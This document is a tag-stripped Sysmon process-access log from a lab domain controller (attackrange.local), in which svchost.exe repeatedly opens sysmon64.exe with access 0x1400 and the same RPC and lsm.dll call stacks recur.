12:01:01.924{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001885Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.924{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001884Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:01.924{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001883Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.924{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001882Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:01.924{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001881Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.924{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001880Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:01.924{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001879Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.916{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001878Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:01.916{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001877Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.916{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001876Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:01.916{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001875Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.916{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001874Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:01.916{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001873Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.916{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001872Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:01.916{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001871Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.916{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001870Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:01.916{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001869Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.916{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001868Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:01.916{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001867Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.916{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001866Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:01.916{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001865Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.916{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001864Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:01.916{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001863Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.916{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001862Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
